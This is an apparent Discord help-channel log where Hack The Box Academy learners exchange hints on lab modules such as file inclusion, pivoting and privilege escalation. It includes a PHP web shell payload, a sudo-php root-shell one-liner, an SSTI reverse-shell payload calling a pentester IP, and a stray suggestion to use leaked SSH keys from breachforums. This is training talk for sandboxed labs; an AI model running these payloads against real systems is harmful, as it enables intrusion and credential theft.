#modules

is there an easy way to tell if its a docker

maybe connecting to the docker

If the port number after the ip address is longer than a standard port number it is likely using docker. Example, Standard: 0.0.0.0:80; Docker: 0.0.0.0:30303

Hello,

doing the final footprinting test. got into imaps and am trying to read the text of the email in inbox. nothing will display.... im lost. It worked in the example before the tests but not now.

can someone help me please?

Kl

@loud sapphirehey

hi

sorry i didnt understand the request.

why would i want to hack a discord server? i just wanted some help with a command i dont seem to be imputting correctly...

sorry, i dont have time to look at that right now. i need to finish this problem up. I honestly dont know if i can hack discord lol. i am noob

silence means vindication. Thank you. 🙂

@loud sapphire May I DM you?

sure. no issues here.

admin wanted to give you a suggestion

create a free conversation

not even worth engaging. Until the next issue.

Thank you to those members who DM's to help me. all fixed now

hi, anyone who has finished Web Attacks module?

Guys

Working on Server Side Attacks - skill assessment, could someone give me a hint ?

idk if it is too hard or I'm just stupid

did you checked the source code @woeful oxide?

what's the issue?

can I DM?

sure

sweet

In fact I found something curious in the source code, deobfuscate it

im not sure if deobfuscation bug dig deeper

Found this

this is a bit too much spoiler so if you still have issue with that feel free to dm me

LINUX PRIVILEGE ESCALATION --- Miscellaneous Techniques

Review the NFS server's export list and find a directory holding a flag.

....I am truly stumped on what to do here. I ran the mount -t nfs <IP> /tmp/mnt

and I cant seem to find this flag, probably because I just don't have experience in using NFS in general

Im embarassed to say it, but I need help 😔

i will dm you

Hello, I am currently on Attacking Common Services - Easy. I got the username and password. I am struggling on uploading file onto \xampp\htdocs. I have tried various methods through the FTP. I cant figure out on what I am missing.

EDIT: latest ftp command:

ftp -u http://<usernmae>:<password>@10.129.98.89/xampp/htdocs/ file:////home/deafsnootz/Desktop/shell.php

Error: ftp: No file after directory (you must specify an output file) `http://fiona:987654321@10.129.98.89/xampp/htdocs/

Am I in the right direction? Thanks in advance! 🙂

[SOLVED] Having problems with the "Remote File Inclusion (RFI) section in the "File Inclusion" module. I'm following the exact steps from the lesson, the reverse shell gets called from the server (http as well as ftp), but the page gives me an error (see screenshot). I tried different ports on my end, respawning, but always get the exact same error. Anyone can make sense of this?

Hello i need help please with the module Attacking Common Services - Hard i found the credentials for F*** and can login via rdp, but i can't login to the mssql server. Maybe i can dm someone for help ?

Hmmm, i found 2 users on the server, but they both have no admin privilegs

Found two more users in TestAppDB

Hello i need help for command injection on module WHITEBOX PENTESTING 101: COMMAND INJECTION

i have the payload but i can't escape it 😦

@delicate osprey try to use automatic tools

i tried but does not work

@delicate osprey what tool did you use

i tried jq -aR .

Hi all, im working trough Login Brute Forcing - skills assesmet - website, and im trying to answer question nr 2. Can anyone give a nudge on what password list i shoud be using? I think i already found the use but it is taking forever using rockyou.txt

Hi, guys! I'm doing the Attacking Common Services module and I'm a bit stuck on the attacking SQL part. I already got the mssqlsvc password hash and crack it but I'm not quite sure how to enumerate the flagDB table. This server has only 2 users (htbdbuser and sa) and I can't impersonate SA. Can someone lend me a tip on how to approach it?

the flag is in ||flagDB|| databases so try to enum that to dumb the flag

if you got the right user the password is in ||rockyou|| but if you still get nothing after a while or get some false positive check your fail string in hydra (the F= thing)

Thanks, will double check the fail string, not 100% sure about the user since it is still taking forever

Guys hot up my rank in hack the box

Dm

submit flags using leaked ssh keys on breachforums

thx

I have found the DB but I don't have access to it as the htbdbuser and I can't impersonate the sa user as well

any assistance on Passowrd Attacks - Credential Hunting in Linux. Found Kira's SSH password and am in. Need to find Will's Password

Has anyone solved the File Inclusion Prevention exercise? They're giving 0 cubes for something that doesn't sound simple and I feel like the lesson explains nothing at all to solve this.

So, either I'm missing something here, or this is another case of where they expect you to either magically guess what a possible way to the solution could be, and if you miss it you spend up hours and hours and hours and hours and hours of your life going in the wrong direction. I've done enough of these, I'd like to know if there is a simple and straightforward solution to this that is indeed explained in this actual lesson.

use method show in that section with the ||browser||

Hello, what modules can I choose to start CTF?

I’m having trouble with Linux Privilege Escalation- Kernel Exploits module. I’m struggling with getting the exploit run in htb

@brazen saffron all

can i dm you. having some trouble still

sure

Hi, did you solve this exercise? Im having the same problem, the access.log stops logging when I change the user-agent to a the php execution code. Pretty sure its a bug, since there are videos doing that and it works for them. Please help 🙂 no sleep for the last 2 days.. 🙂

hello

can someone guide me?

im new

if you use duplicate quote for your payload like this <?php system($_GET["cmd"]); ?> change it to single quote like this <?php system($_GET['cmd']); ?>

https://www.youtube.com/watch?v=lhz0-qAQlBM

Yep there is a bug ..

Thanks!!!!! so close but sooo far, hate dont seeing those details :(. Now I can continue

If you make the false req
The whole log will hang up and you have to restart the machine and hope for a changed Ip:Port 😂

@vital adder helped me, it was a fu...cking double quote 😆 . Now itś working with the right one <?php system($_GET['cmd']); ?>

Nice one 😗

Hi, have you been able to solve this by any chance?

Can anyone give a nudge on login brute forcing skill assesment - website question 2, i think i have the right syntax/fail in place but i am starting to doubt if i am using the wrong username.

Think about how to ||disable_functions||

Not the place to talk about that

hello can you help me with the last section of fundamental windows with the first question which is "What is the name of the group that is present in the Company Data Share Permissions ACL by default?" I have already completed all the only thing missing is, please.

please i need help on his

smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

i got access denied while trying to list dir

on what?

password attack module

then you're logging in with the wrong user...

The right one should be fairly obvious!

thanks

i'm using brute force

i got the first user

dm if you want to

your reply indicates me to check for more result

i just saw another user

I found msf a lot faster for that particular scan

yeah

i used msf

i saw upto five users

the last one have the accessible right

thanks

I started taking the Linux fundamentals module and im having a rough time learning all the commands. is there a step i need to learn before diving into linux or is it just my brainrot?

I'm also doing the linux fundamentals module right now. I find it easy to right down important commands on a notepad for later use. Practise the commands and you'll find them easy to use later on

Your brain is not rot. I first used Linux working with point of sale systems, i legitimately had no idea what I was doing for almost a year.

yeah, there are a LOT of commands in linux, the most important thing to remember is what you can do with commands, you can always look for the answer easily enough when you know what you are looking for

i would encourage you to try and reproduce as many of the sample commands as you can and experiment. And if you aren't sure about how to do something, fall back on your Google-Fu.

and the Discord is here to help too 😉

Yess, We will always be here to help.😊

Unfortunately, drilling Linux commands is not the most exciting or interesting thing in the world. But once proficiency is obtained, your world will open up

You can also run Linux within windows now with no need for a vm so that might give you more opportunity to practice. I would recommend going for debian if you plan to work with things like kali or parrot (don't try to use them as your AV won't like it!)
https://docs.microsoft.com/en-us/windows/wsl/install

when it ask to create the home directory for a new user using options.. what does it mean by options. is it other commands that i have to use to create a home dir?

again thank you for the help. it means alot being the only person in my family and friend group that loves tech makes it a lil more difficult but its not gonna stop me .

@tardy yew May I DM you?

of course!

feel free to DM me 😉

I was able to get the flag by ||eventually guessing the favorite color||

Did anyone submitted the flag for the final assessment of the sqlmap, and got rejected?

I found the flag but get declined

I haven't done that module, but check the flag is complete and that there's no spaces before or after it

there isn't

so strange - it's my final module

the Skills Assessment? if you still can submit that flag shoot me a dm i'll check your flag

Sent

thanks bro

How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to rhe flag

anyone can help with password attack hard lab?

if so, let me know if i can dm. thanks

Which wordlists to use to crack the ||backup||

use the ||mutate password list||

yikes, just stopped it becuase it was 2% completed after an hour. will run again and go to sleep. thanks

did you use ||bitlocker2john|| then ||grep "bitlocker$0"|| then use hashcat? it shouldn't take that long

I need a nudge on Pivoting, Tunneling, and Port Forwarding: Skills Assessment. I think I may be on the right track,but I'm 100% sure if I am following the right path to get there and I'm struggling a bit.

which part?

The next to last question. Utilizing a common remote access solution to pivot. I got to the first Windows box with the credentials for ||mlefay||. I used ssh -D with ||webadmin|| and it's ||id_rsa||. From there I used ||proxychains|| to ||xfreerdp|| to the box. I was able to upload laZagne and get ||MS Cache|| hashes for ||admin|| and ||vfrank|| as well as other info. For the life of me, though, I can't figure out how to maneuver to the next system, which I am pretty sure is ||172.16.6.35||. Netsh doesn't seem to be doing it, nor do some of the other options.

removed other stuff and left only line starting with ||$bitlocker$0|| now and trying again. my mutated is 94K passwords. did i do something wrong in generating it from the custom.list or it is supposed to be that long?

you're on the path except you got the wrong host, did you run a ||ping sweep|| just like you did on the previous steps? if you did you should find the host you need to rdp to

I did, but I only get responses from ||172.16.5.15|| and ||172.16.5.35||. Ipconfig shows me ||172.16.6.35|| though, which is what made me think that was the right one.

you need to run the ping sweep from the host|| 172.16.6.35 ||or if you've a ||meterpreter|| session you can add route to that network as well the run a ||ping sweep||

Okay, so where I'm struggling is how to pivot to ||172.16.6.35||

Hmmm. I haven't tried ||SocksOverRDP||. Maybe that's it?

ou

Nvm. That seems to not be working. It keeps disconnecting me from my RDP session.

n

ñ

if you've access to ||mlefay host||, you'll find he's connected to the other network, run a|| ping sweep|| from there you'll discover ||another host||, if you did get ||vfrank pass|| you need just to ||rdp|| to that host with the ||vfrank's creds||

I know this is like 5 months off, but god dang i feel stupid. I connected to it previously, but was like nothings showing lmao. for future people remember hidden files im so embarassed

Ah right, so that's what I thought. Should I be trying to crack the ||MS Cache Hash|| for the pass for ||vfrank|| or am I overly complicating it?

easiest way drop ||mimikatz|| in there and you're good to go

Ahh okay, thanks. I'll try that

94k is the normal after mutation, it'll take less than 30min for that one

ok thanks. will wait and leave you alone. you are very busy 🙂

you can shoot me a dm as well

were you able to get this sorted out? I recall a different section in SQLMap Essentials where it will sometimes spit out the flag with a character or two wrong... But this is the first I have heard of it happening on Skills Assessment

hi, im stuck at DNS footprinting, can anyone help with this , thank youuu
Image

I did, someone helped, there was a wrong charecter

Thanks!

Feel free to DM me 😊

Hi I need help with linux escalation privlege htb academy training

I have a huge problem with trying to work on a previous module. The LOGIN BRUTE FORCING module when i try and run hydra I keep getting "could not connect to ssh://<IP_ADDR>:22" **Specific IP address.

@heady hamlet use cme tool it works prefect

i think you should use the port provided in the module target instead of 22

Yeah stupid me...

Hi everyone , i'm stuck in module File Inclusion , i was able to see the source of the website and i am trying to poison the Nginx access log with user-agent but it seems to fail , can anyone suggest me ?

Have you tried to poison the session and access the session file then?

Remember that you have to do it twice, first command then you read then another command, because the previous one overwrites the other

Good Morning good people!! Can I get some help with Information Gathering - Web Edition/Active Subdomain Enumeration? I'm having trouble getting the FQDN of the nameserver inlanefreight.htb

Poison environ and see results on log file

https://www.cloudns.net/blog/10-most-used-dig-commands/

Thanks @acoustic owl!

Anyone can help me with uploading file to that certain directory on Attacking Common Services - easy?

EDIT: I managed able to write that directory. Unable to execute the reverse shell. Progress made...

How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to the flag

thanks

any hackers from India

Hey everyone

Is windows privilege escalation Vpn down?

It’s going through fatal error somehow

Would you happen to have a screenshot of the flag it was printing out?

maybe try a different vpn?
https://academy.hackthebox.com/vpn

i get this error when trying to load shellcode with python in binary exploitation. can anyone help

Didn't save a screenshot, but DM me if you finished the task - I remember the bad char

Is doing writeup for academy permissible?

@high zinc

My apologies if I am misunderstanding --- are you asking if it's ok to create write ups for Academy modules?

Hello, I am doing the basics academy modules and found a privilege escalation method that I don't understand

Can someone explain it to me? it gives you root access with meterpreter

shell
sudo -l
CMD="/bin/sh"
sudo php -r "system('$CMD');"

shell drops us from meterpreter to a standard linux shell

sudo -l is used to check sudo permissions , which reveals we can run the php binary as sudo

CMD="/bin/sh" we are just setting an environmental variable

the final command we use sudo to run php as the root user, and specifically we use php to run a bourne shell ("/bin/sh")

essentially just spawning a root shell for us.

Thanks, I understand it perfectly now

@light epoch

Using sudo php -r "system('/bin/sh');" would work without setting the env variable?

yes i believe so

i don't see why it wouldnt 😉

of course we could always test to confirm

don't worry, ty

@west canopy do you think we will get some module s in the future or

Anyone mind helping me clarify some stuff on the footprinting academy module, specifically the dns enumeration questions?

yes more modules are coming 🙂 also updates to old modules

@west canopy wow 👌

Yes

I got it solved, didn't realize how to properly use the dig command.

Right, for ||DNS Zone Transfers|| I usually just do: ||dig axfr <subdomain> <IP Address of Target>||

My understanding of what's going on under the hood is kind of fuzzy but I more or less get how it works. If the first zone transfer is successful you can pretty much|| do the same thing again, just trying zone transfers against all discovered subdomains||

Yes for Tier0 modules, writeups and streaming are fine 😉

Obviously we can't stop you from making or distributing write ups for other modules

so if you go that route do us a favor and try to make them as educational as possible

So I figured out how to add .html to each search word but is there a better/shorter list then the seclists common.txt

for standard directory fuzzing i usually use directory-list-2.3-medium-5000.txt

i think common.txt is one of the shorter lists too right?

I'm not sure I can Google it everything I've tried it I get to about 200 words in and it starts to error put on me

What's the point though?

Admittedly this is the first time a properly set it up to add the .html to each entry so maybe it's just best to let it do its thing it just seems so slow bc of burps throttling I prefer gobuster

I did have to search for a write up just today to escalate privileges in the end of a module

My class is struggling with the linus prevesc module. So i was thinking about making a write up for it and upload it in my website. @high zinc

Ah i see

Because the module explained how to do it with linpeas or LinEnum but I couldn't execute them in the box pc

Our class have 40 student. Im the only one who solved the whole thing. And even i struggled lol

I just checked its tier2... so bo writeups

Where are you all getting stuck?

I remember being stuck on that module for three weeks because of the Privileged Groups section. Don't tell anyone but I might have actually|| bought the module for a friend ||just so he could help me work through it and finish it

Privileged group and the last section.
This are the main modules people are suffering the most.
Other sections as well too

one sec let me DM you 😉

Learned a sick 1liner from him.
+rep

best meme

Hi I was wondering if someone managed to get a reverse shell for the SSTI Example 3 Section, via the command showed in the section itself: {{''.class.mro[1].subclasses()214._module.builtins'import'.popen('python -c 'socket=import("socket");os=import("os");pty=import("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'').read()}}

https://academy.hackthebox.com/module/145/section/1343

Once i got the flag I moved on I think

Hi, I have a problem with the last section of the windows fundamentals module which is "What is the name of the group that is present in the company data sharing permissions ACL by default?" I tried everything creating a group that I am asked to search for all the groups with commands and also in computer management and nothing.... please help me I have been trying everything for several days.

isn't it ||Everyone|| ? 😉

I don't understand

good evening, i need a hint or help please. At the moment i'm working on Pivoting, Tunneling, and Port Forwarding | Skills Assessment. I'm struggeling with Question 6 and i think i'm in a while(1) that takes forever. Because i found a Linux server where i can login via ssh. on the Server i found a second network ||172.16.5.15||. I pivot through the linux server via proxychains and rdp on ||172.16.5.35|| with ||mlefay||. Then on the Windows server i found another network ||172.16.6.35|| and i can login via rdp from ||172.16.5.35|| with ||vfrank||. and now im stucked, all the flags on both windows server are the same, i found about 4 flags per server and the are all the same like ||single-piv-blablalba||. Thanks for a hint. I looks like they are both connected with no way out

would be nice if i can dm someone

OMG! Attacking Common Service - Assessment medium is SUPER EASY! I Don't understand why the easy assessment is so hard!

the ||vfrank|| should be the last machine check both of the flag are on there check the ||mounted network drive|| if you can't find them try restart the target machine someone i help have this issue before

the easy one actually have ||2|| way to get the flag so if it isn't hard enough try to find the ||second|| way

please can ayone give me hint on what to do

I'm not there yet..

@foggy light hey cutie

i don't think i did that module yet but which module is that and btw if you need help with something in the htb academy pls provide both the module and section name

I think that i'm both times on the same Microsoft box

https://academy.hackthebox.com/module/85/section/905

wydm?

Hey so I'm on the web proxy module doing the burp intruder section I amended my request to include the .html at the end of each search I'm using the common.txt from seclists the scan is taking too long and the machine shuts down. Is there a way around this a small word list maybe? I did get a few pages throwing a 403 code should I look at those and see if I can manipulate the headers some how

wydm ?

because on both machines the ipconfig table looks exactly the same

oh that's weird

but the rdp session says that i'm definitly on two different networks

try restarted your target machine if you still have this weird issue shoot me a dm i'll help you troubleshoot

once 172.16.5.35 and once 172.16.6.35 i mean i don't now the subnet mask yet but thats something i should check

thanks mate, i will start it again

box if that is a different network

and i tried one more thing, i can create on user ||vfrank/172.16.6.35|| desktop a file and it will show up on ||mlefay/172.16.5.35|| in the vfrank path

if you still stuck feel free to DM me 😉

there is definitely an issue with your target machine or i'm just dumb at AD

can i dm you ? it happens again

sure

anyone else got the new pwnbox this look like it's still in beta

it looks like some one shot that bird

gut shot with a slug

That's a dope parrot bg

the theme look great but firefox are missing something

It's a beautiful looking OS.

Looks pretty cool

Haven’t checked though

cool but buggy (so far burp only)

No, I haven't, either. I'm a Kali guy. I'll get around to it eventually.

You should give Zap a try.

The HUD is really nice.

Me too… will take a look at it

and it's open source.

If you can afford the full version of burp though

yep i did and still not a fan

Yeah haha same .

I love burp

me too

It's just so stable and clean

simple interface

the documentation is on point.

not some of the new version though

Not clunky

Oh really ?

Is there any special feature in ZAP that burp doesn’t have ?

The HUD

but you could probably do that in burp

Well not probably you definetyl could.

yep haven't it that much but just some normal bug

Could be a memory leak from your browser slowing things down rather than burp its self.

It's hard for me to gauge software these days; my computer is a beast.

So i'll have to take your word for that.

we should probably take this conversation to a different channel though

also the new burp for the pwnbox you can't use it with the small pwnbox screen you have to use full screen which is a bit annoying

We're going to get in trouble for being off topic

Yeah 🤣🤣

yep

Good chat though

yeah 🙂

See you around fellows

https://tenor.com/view/peace-out-gif-22295199

^ cant even post gifs

i know, we run a tight ship here

https://tenor.com/view/vivi-walking-alexandria-final-fantasy-final-fantasy-ix-gif-22658851

😆

Can someone direct me to information about how to log in and spawn a system IP from a remote server without a GUI??? lynx isn't providing the button for spawning. So I can't run the slower pw-cracking methods on my fast server. NO GPU at home!!!

Hey guys

Someone can give a hand with the Broken Authentication - Default Credentials?

idk if I need to use Hydra

nope no Hydra, just|| a browser and google|| 🙂

so perhaps jarednexgent is implying "default credentials" might indicate - follow the advice given in the module and "Take the most obvious guess"... heh...

also if we ||right click in firefox and view page source|| we can find some useful information

heya. doing the Using Web Proxies assessment. The 31 char cookie part.
I need to generate a list of potential cookies (32 chars long) using my 31 char captured cookie as a base.

Whats the best/easiest way to generate the list? I am missing something easy here.....

i use the Payload Processing thing in burp intruder

the processor will be used to encode it all back up only tho?

Can i make the processor generate the list and then code it all back up?

no idea what you mean but in burp Payload Processing you can add the single wordlist payload to the first 31 char of the cookie and encode them all

can i dm you a screenie so you can see what i mean please?

sure

Got you guys

I've been overthinking it haha

i did it the low IQ way and manually prepended the 31 character hash to the wordlist

at one point i almost did that too, the burp Payload Processing thing is so confused

i realised with a hint from Mr Tom how to generate the list using burp. Prefix is the 31 chars then encode in payload processor.

I just need to know how to set up the payload position now..... ffs...

i think im winning

Found it

It was in front of my eyes

got it

Hello someone can give me a hint for the exercise "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag" in BROKEN AUTHENTICATION module. I modified the python script different ways and i cant get it, also i modified the X header

what if instead of using the python script we just ||use something like burp or curl to make a request, and manually add the X header||?

thank you it was helpful, have a good night

Hi all, im currently doing the linux fundamentals, i was hoping to get some advice on what the "format" of the answers need to be in

For the following question:
||What is the path to the htb-student's mail?||
I use the following command
||env | grep mail||

||MAIL=/var/mail/htb-ac588612||

im pretty sure this output contains the answer but can't seem to put it in a format that seems to work?

anyone know if im doing something really dumb?

we need to SSH into the target machine first 😉

looks like you are currently running the command from PwnBox

thanks for the tip ^^ much appreciated ❤️

helppppp, im stuck at DNS footprinting. can anyone help what to do

Dm me 😊

hello

is there any solution to gobuster dns -d command being incredibly slow?

Can someone explain what this thing is?

• CPE credits submission

Hello 👋🏻 Windows Privilege Escalation Module; Interacting with Users section… The techniques in this section aren’t very clear and can’t make them work to obtain the answer for the question, any help?

Try me

What do u mean?

Well, where do you need help?

On the section’s question which asks for the sccm_sec password, also I wasn’t able to replicate the responder part of the section but I’m not sure if it’s related

Hey Guys, who can hint me Windows Privilege Escalation Skills Assessment - Part II - 2nd Question?
I have enumerated vulns but they are to many. Also, I tried follow examples from the module but have no luck.

hi

Good afternoon! Question on Attacking Common Services - Hard. I'm on the RDP, but can't access the SQL server. I've tried all the combinations of credentials but still not having success. I've tried with sqlcmd and using studio. Is there something obvious I'm missing? 😦
Nevermind, I realised that studio was pointing at the wrong server

Hi @hearty walrus , please note that we do not discuss that on this server as it can cause serious damage to the server you are trying to hack into. If you wanna learn hacking, please only hack the machines provided on the htb website. Rule nr 1 of hacking: If you do not know how to do it, then you don't have the permission to do so. Kind regards, thecyberteam

They already got the boot. banned for a very long time

Thx for the update

Hi, can anyone give me a hand at Skills Assessment - File Upload Attacks? I'm stuck

I did it

Ohhhh yeah, finally finished Attacking Common Services. That was an exercise in frustration, but definitely worth it.

Uh why?

When I do a GET request I get it.

Nvm, I guess it's because I did not add the last "/" at the end of the URL.

anyone having trouble accessing the user ||fiona with the correct password on sqsh|| on attacking common services - hard lab. i was about to take some notes, but now i cant access it. Can anyone confirm it is not just me 😓 nvm! i reset the server, its working now

Hey guys. I’m at passwords attacks on network services part. Trying to find the winrm username and don’t have any clue where to start. I was thinking bout using nmap and dig some info and got user named WINSRV, but I think I’m misleading, cause didn’t got any pass with crackmapexec (used rock you files and some more), any ideas?

Trying to brute +userlist

have you looked at he Resources available at the top of the module?

for this module there is a provided username and password list we will need to use

How did I missed that;)

Lol

F

Hey, I am stuck in skills assessment - wordpress, i started the machine, ran nmap, dirbuster and wpscan but i can't find any wordpress directories any help?

@rustic sage did you look on all links because one link has WordPress

hi, it's me again with the DNS footprinting, i finally solved the first question, but i cant find the answer for the last one, any hint?

@placid quest from the gobuster output I checked them all

Hey you need to find the zones within the subdomains

oh ya, i got some of it but i cant find the one with octet 203

@rustic sage not on gobuuster look at the form of the website it has some links and one link has the WordPress you will need to add it in /etc/hosts

@placid quest oh ok thx

Dm me

i dunno man... i looked around and this ||blog|| page seems interesting 😉

Thx i got it

What exactly do these days mean?

Approximate amount of days to finish this course(?)

I thought so too, but based on what 😄

8 hours a day?

or maybe amount of content it has

Anyone finish the Web Attacks module I can bounce some ideas off of?

sure feel free to dm me

hi, im at SMTP footprinting. How can i find user in it?

use metasploit

the module dont talk about metasploit

just telnet, HELO, EHLO, and nmap

i think you can use that but metasploit is faster

ok, im spawning target and tryna use it

Hey so I'm on the web proxy module in the ZAP fuzzed section. I've found the cookie I found what it's hash equal but I can't figure out how to set up the fuzzer so it actually uses the cookie. I've highlighted and right clicked it and selected fuzz but it just brings up my request header.

first don't set the threads too high and you need to use the given wordlist

@wide river change the list of use names

ok, imma set THREADs back to 1 and change new wordlists and see what happen

you mean seclist right ?

Hi, anyone has any idea on how to fix this? It should be as straightforward as it looks i guess..

nope and also that's weird try turning on the verbose

command is exploit -v right?

nope it's set verbose true

it running, give me couple sec

hah XD?

wait what wordlist is that?

from the seclist

no use the given one

the one already in the metasploit?

nope the one in the Resources

i only did that part in burp so if you still need help shoot me a dm but i can only help you in burp

Thank you but it is for the zap section I just got through the burp part last night

yeah i did every section in that module with both burp and zap but i forgot this section in zap so i'm trying it right now

I just don't understand how to feed the cookie into the fuzzer I can't modify the header to include it and use it as the attack position I feel like that's the goal

in burp it's so much easier to use intruder

oh, ignore the tag mesage

wrong one

I'll respin my ma hine and try burp I just wanted to try and do it with zap learn what the goals are. I figured out the hash value by just manually feeding the wordlist through the decoder is there a way to just use that info to directly get the flag I tried feeding it into the url but just got a 404

that list have 101 word why did your end so quick?

that's the cookie you can't feed it to the target url and yes i also doing with zap just to know how to do it

good question, i just leave it there until it done

i do nothing XD

yeah.. that's how brute force work so yes do that

i did that, which is what you see in the picture lol

the whole thing i do was

show smtp_enum

use 0

set RHOSTS

oh wait what so is just stop?

set USER_FILE

try doing: Import-Module .\SessionGopher.ps1

and let me know if it works

yesssssssssss

he found the issue (missing 1 dot)

if your metasploit randomly stop for no reason then i have no idea

ok, so can you show me how to do it with HELO, EHLO, VRFY

basically stuff in the module?

nope i use metasploit

so don't know how to do that

yep that one

imma just restart the whole machine and try it again

thank you so much

careful with the spoilers

does anyone have hacks for btd battles

#modules message

hi i have question in the module POP3/IMAP. It ask for the organization and i use NMAP to find the result as you see in the picture, but the answer is incorrect, can anyone tell me what i do wrong?

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

also, how to dela with the last 2 questions XD?

alguien que haya hecho modulo broken authentication help please

hey, i have a question, how do i level up and stop being a noob? I'm doing the beginner's part and I went to the second stage, but there was no progress...

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

Wooohoo! Footprinting done!

congratssss

Thanks 🙂

Hey im working on the pivoting forwarding and tunneling module, the RDP and SOCKS Tunneling with SocksOverRDP section says to use proxifier, but the site is down, anybody overcome this?

@thorny stag practice more

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

Every path where you find a vulnerability is the correct path. You should check every possible thing you can do with the vuln you got. If it gives you nothing more then switch. This being said, I have no idea what the module is about but I hope it helps

Good point. Thanks for the approach outlook

Hi everyone!
Who was succeded to make CVE-2020-0668 Attack from the Kernel Exploits section of the Windows Priv Escalation module?
Where did you get UsoDllLoader.exe / diaghub.exe?

Any tamil people to play HTB together?

Can somebody help me with the Type Filters section of the File Upload Attacks module, i managed to upload the file but i'm getting: cannot be displayed because it contains errors.

try to upload gif instead of jpeg

++identify

hey guys... is this the right place to seek help with modules on HTB Academy?

Hello, I am stuck on SERVER-SIDE ATTACKS of SSTI Exploitation Example 1，I can't find the hidden flag，Could someone give me hint? thanks

I am trying to do the banner grabbing but I do not get it.

Can i dm?

yes it is

guess I'm in the right place... If someone could help me, give me a hint, I would much appreciate it. I'm on File Inclusion (fundamentals), module 23/section253... I have gained RCE through PHP Input Wrapper... the flag should be at / , yet http//IP:PORT/...&cmd=/ does not show anything, while &cmd=id i do get uid=33(www-data)... cmd=pwd i get /var/www/html... any help on this would be highly appreciated

in which module? Because I did stage 1 of level 1, and there was the vip part and I didn't do that part, so I went to stage 2 with 76% in the first, I think... but I didn't level up...

Dm

yea sure

I solved it, But why os -shell don't show all output?

@thorny stag Everything takes time

Wrong port :>.

Never mind i solved it

I don't get tplmap installed on a Ubuntu VM.

Good morning good people. Can I get some help with running fierce. I can't seem to get it working.

fierce: error: unrecognized arguments: -dns inlanefreight.htb -wordlist /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

Try sudo pip ...

Dm me 😊

same error

you should install it in python2

I tried with pip and pip3

python2.7 -m pip install -r requirements.txt

you can execute python command to check the python version , because pip also may be in python3

Default is Python3

Yes,that is the reason

I forced my machine to install it with Python2.7

But same problem

because the "pip " also default in python3

So,you can create a virtual python2 environment

then install the tool in virtual environment

okay, I will tryu

like this

I wanna join a learning team

@placid quest could you teach me how to hack a website? or indicate a site/test to train? or something like that?

Ou eu poderia te adicionar? Daí poderíamos conversar melhor...

You mean... besides Hack the Box?

uh why?

Add -Pn flag?

Yeah but, I have not the version.

Because it got filtered.

it is

filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.```

So what can I do to know the version?

No idea, which module/exercise are you doing?

"Getting Started".

best thing to do when asking for help here is to start with that, and then problem

Service Scanning.

I'd possibly check the IP address is correct.

I just tested it, and you should get an open port.

Assuming you are using pwnbox

Can I dm you?

hey guys noob here, am trying to solve the http rdownload with curl but it dosent to seem to work
curl -s -0 http:/[ip]:[port]/download.php
used this command

@pine dagger.

could help me with module broken authentication give me hit please

It's the same IP.

hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took to long to respond and nothing happens idk what to do
ping me if you can help

help me modele broken authentication please

Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?

Can anyone help me with https://academy.hackthebox.com/module/67/section/630

What is this rank?
From the Academy? Or from HTB?

Hi I have a question. I searched for vulnerability CVE-2021-4034. i used msfconsole, however, i don't know how to get the session id on the attacked hoset (reversed shell). Does anyone have an idea how to do this?

From the Academy. It's a module on PrivEsc on Windows.

i think its a Discord thing

The home stretch

My question was about posts that have already been deleted. But I can probably help you anyway. DM me

Go Go Go 💪

lol bro i have been stuck for weeks, slow slow progress

lol its just the final bosses left

hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took to long to respond and nothing happens idk what to do
ping me if you can help

repost

If you need help, DM me. I've done all of these modules except BloodHound.

Thank you, I will take you up on that

midday tho, morning are for music🥳

No idea what time zone you are in. If I'm online, I can answer you, otherwise you have to wait until I'm online again 😉

hey guys, i need some help on the easy footprinting skill assessment

when i try to connect to the ftp server with the pwnbox i got this error:

on my kali vm i can connect but got wired messages when i try execute commands

And when i try to download the files with wget the directory is empty

not sure whats going on there 😄

is there any video explanation available for a certain module

dont think so

man..

What exactly did you not understand?

Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?

is parrot ternimal the bash terminal?

I normally interact with ftp with the following command: ftp 10.129.227.16

After it can connect, it will ask for creds

Do I need to search somewhere other then ping.php I've tried just searching for the txt file that way but get a 404, I've looked in the etc/ I get blank pages. I'm just not sure where to direct the search at this point

does anyone know how to write in community strings for braa? I found the one i needed but i dont know the correct way to write it out. i know thats its <community string>@IP but I'm not sure which part to put in

are you training?

if you mean doing academy footprinting module

yes

yeah

i got an output from onesixtyone for a community string as per the module, but it doesn't say what the correct way to write it in is and any way i try doesn't seem to work

ask someone experienced

a chinese hacked me what to do

Hi, can i get a nudge on windows privilege escalation skills asessment 1? I have tried all exploits on windows exploit suggester, but no one seems to elevate my privileges..

Try whoami /priv

++ identity

https://academy.hackthebox.com/module/85/section/908

